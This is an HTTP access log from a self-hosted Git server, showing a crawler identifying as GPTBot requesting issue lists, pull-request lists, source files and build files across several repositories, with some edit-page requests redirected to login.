"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:07:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets?display=source" [Client 74.7.227.38] [Length 11602] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:19:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props?display=source" [Client 74.7.227.38] [Length 11785] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:19:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11037] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10262] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:19:07:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:19:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:19:07:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:19:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:19:07:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:19:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:19:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=open&type=all" +[17/Feb/2026:19:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&sort=latest&state=open&type=all" +[17/Feb/2026:19:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&sort=latest&state=open&type=all" +[17/Feb/2026:19:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:07:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" +[17/Feb/2026:19:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:07:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15344] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11622] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11070] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:19:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:19:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr 